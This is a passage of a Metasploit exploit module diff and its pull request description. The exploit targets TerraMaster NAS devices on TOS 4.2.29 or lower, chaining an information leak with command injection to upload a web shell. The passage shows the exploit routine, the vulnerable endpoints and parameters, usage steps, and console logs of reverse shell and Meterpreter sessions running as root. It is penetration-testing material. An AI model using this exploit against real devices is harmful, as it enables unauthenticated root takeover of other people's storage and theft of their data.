+    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29')
+      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")
+    end
+
+    CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")
+  end
+
+  def exploit
+    # get the leaked data
+    get_data
+    fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?
+
+    res = upload_webshell
+    fail_with(Failure::UnexpectedReply, 'Web shell upload error.') unless res && (res.code == 200) && res.body.include?('createRaid successful') && res.body.include?('true')
+    register_file_for_cleanup(@webshell_name.to_s)
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :php
+      execute_php(payload.encoded)
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager(linemax: 65536)
+    end
+  end
+end


### PR DESCRIPTION
This module combines [CVE-2022-24990: Leaking sensitive information](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990) and [CVE-2022-24989: Authenticated remote code execution](https://www.redpacketsecurity.com/terramaster-tos-command-execution-cve-2022-24989/) to achieve an unauthenticated RCE by exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password hash and mac address to achieve unauthenticated access and use the vulnerable endpoint `api.php?mobile/createRaid` with `POST` parameters `raidtype` / `diskstring` to execute remote code as root on TerraMaster NAS devices running TOS version `4.2.29` or lower.

Installing a vulnerable test bed requires a TerraMaster NAS device that can run `TOS 4.x`
This module has been tested against a TerraMaster `F2-221` Model with the specifications listed below:

* TerraMaster `F2-221`
* CPU: `x86`
* TOS Version: `4.2.08`

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/terramaster_unauth_rce_cve_2022_24990`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings

## Options
No specific options.

## Scenarios

### TerraMaster F2-221 TOS 4.2.08 - Unix Command `cmd/unix/reverse_bash` session
```
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 0
target => 0
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.2:54556) at 2023-06-10 12:31:22 +0000

uname -a
Linux TerrorMaster 4.13.16 SMP Mon Jun 10 14:32:13 CET 2023 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
```
### TerraMaster F2-221 TOS 4.2.08 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
```
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 1
target => 1
msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045348 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (192.168.10.1:4444 -> 192.168.10.2:46174) at 2023-06-10 12:39:01 +0000
[*] Command Stager progress - 100.00% done (810/810 bytes)

meterpreter > sysinfo
Computer     : 192.168.10.2
OS           :  (Linux 4.13.16)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
```

## Limitations
No limitations.
